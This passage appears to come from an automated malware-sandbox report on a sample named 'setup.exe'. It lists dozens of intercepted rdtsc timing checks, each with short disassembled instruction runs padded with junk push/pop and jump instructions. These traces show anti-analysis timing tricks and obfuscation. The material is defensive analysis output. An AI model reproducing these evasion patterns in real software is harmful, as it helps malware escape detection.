                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E97E75 second address: E97E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 ja 00007FF32CDD6566h 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E982B4 second address: E982CC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FF32CFB71FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E982CC second address: E982D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E9844F second address: E98466 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7203h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E98466 second address: E98472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FF32CDD6566h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E98795 second address: E98799 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E9BD2C second address: E9BD44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF32CDD6566h 0x0000000a jmp 00007FF32CDD656Dh 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E9B534 second address: E9B53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E9B53A second address: E9B55B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FF32CDD6579h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E9B7CC second address: E9B7F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edi 0x00000006 pop edi 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jmp 00007FF32CFB7204h 0x00000014 pop edi 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E9B7F0 second address: E9B7FE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 jp 00007FF32CDD656Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E9BA74 second address: E9BA7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EA2DAA second address: EA2DF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD656Bh 0x00000009 jmp 00007FF32CDD656Bh 0x0000000e jmp 00007FF32CDD6576h 0x00000013 popad 0x00000014 jmp 00007FF32CDD6575h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EA2DF0 second address: EA2DF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EA2FAE second address: EA2FB8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF32CDD656Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EA33C0 second address: EA33C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EA33C4 second address: EA33E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF32CDD6571h 0x0000000d js 00007FF32CDD6566h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EA33E3 second address: EA33F4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ebx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EA33F4 second address: EA3412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD6578h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EA3412 second address: EA3423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF32CFB71FAh 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EA36C9 second address: EA36CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EA36CD second address: EA36EE instructions: 0x00000000 rdtsc 0x00000002 js 00007FF32CFB71F6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007FF32CFB7203h 0x00000012 pop esi 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EA36EE second address: EA36F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EA36F5 second address: EA3718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB71FDh 0x00000009 jne 00007FF32CFB71F6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edi 0x00000013 jl 00007FF32CFB71FEh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EA3F66 second address: EA3F9D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF32CDD6568h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jng 00007FF32CDD6566h 0x00000015 jmp 00007FF32CDD656Eh 0x0000001a push eax 0x0000001b pop eax 0x0000001c popad 0x0000001d jmp 00007FF32CDD6571h 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EA4810 second address: EA4820 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FF32CFB71FAh 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EA4820 second address: EA4838 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF32CDD6568h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jne 00007FF32CDD6566h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EA4838 second address: EA484A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EA484A second address: EA484E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EA484E second address: EA485A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FF32CFB71F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EA9AD0 second address: EA9ADD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EA9ADD second address: EA9B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB7202h 0x00000009 popad 0x0000000a push ebx 0x0000000b jmp 00007FF32CFB71FDh 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EA9B07 second address: EA9B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EAA024 second address: EAA028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EAA1C6 second address: EAA1D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FF32CDD6566h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EAA1D2 second address: EAA1D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EAA1D6 second address: EAA1DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EAA4AA second address: EAA4AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: DF8E2D second address: DF8E45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6570h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: DF8E45 second address: DF8E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FF32CFB71F6h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EB31F7 second address: EB3212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD6577h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EBB976 second address: EBB98F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007FF32CFB71FCh 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EBB98F second address: EBB995 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EB9C41 second address: EB9C51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FF32CFB71F8h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EB9C51 second address: EB9C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD6578h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EB9C6F second address: EB9C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EB9C73 second address: EB9C7C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EBA46B second address: EBA48E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF32CFB7208h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EBA48E second address: EBA492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EBA79F second address: EBA7A5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EBA8FA second address: EBA919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007FF32CDD6572h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EBA919 second address: EBA930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB71FEh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EBA930 second address: EBA938 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EBA938 second address: EBA971 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7208h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF32CFB7207h 0x0000000e jl 00007FF32CFB71F6h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EB969A second address: EB96A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EB96A2 second address: EB96B6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FF32CFB71F6h 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC245C second address: EC2462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC2462 second address: EC2474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007FF32CFB71F8h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC2474 second address: EC2481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC2481 second address: EC2487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC2487 second address: EC248B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC2151 second address: EC2185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 jmp 00007FF32CFB7203h 0x0000000b pop esi 0x0000000c popad 0x0000000d jne 00007FF32CFB7218h 0x00000013 pushad 0x00000014 push eax 0x00000015 pop eax 0x00000016 jmp 00007FF32CFB71FEh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ECF1E5 second address: ECF1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jng 00007FF32CDD6566h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ED1BC8 second address: ED1BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF32CFB71FDh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ED1BE0 second address: ED1BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ED1BE4 second address: ED1BE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE51EB second address: EE51EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE51EF second address: EE520B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7205h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE520B second address: EE5216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE503D second address: EE5046 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE5046 second address: EE506F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD6571h 0x00000009 jno 00007FF32CDD6566h 0x0000000f jmp 00007FF32CDD656Dh 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE506F second address: EE5074 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE5074 second address: EE507C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE7A01 second address: EE7A0C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jne 00007FF32CFB71F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE917C second address: EE9195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD6573h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE9195 second address: EE919A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE919A second address: EE91DB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF32CDD6568h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jne 00007FF32CDD656Eh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 jmp 00007FF32CDD6579h 0x0000001a pop edi 0x0000001b pushad 0x0000001c push edi 0x0000001d pop edi 0x0000001e ja 00007FF32CDD6566h 0x00000024 popad 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE91DB second address: EE91E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE91E0 second address: EE9203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD656Bh 0x00000009 jmp 00007FF32CDD6572h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EEB71F second address: EEB72E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007FF32CFB71F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EEB72E second address: EEB734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EEB734 second address: EEB73F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF1A0D second address: EF1A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF1A11 second address: EF1A1D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF32CFB71F6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF0376 second address: EF037C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF0635 second address: EF063B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF063B second address: EF0657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF32CDD6576h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF0657 second address: EF0675 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7209h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF07C1 second address: EF0801 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007FF32CDD6574h 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 push edi 0x00000017 pop edi 0x00000018 pop esi 0x00000019 jng 00007FF32CDD6578h 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF0984 second address: EF099E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007FF32CFB71FFh 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF099E second address: EF09A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF0C3A second address: EF0C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FF32CFB7201h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF523E second address: EF5250 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007FF32CDD656Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF5250 second address: EF5254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF5254 second address: EF5259 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF5259 second address: EF5278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB7209h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
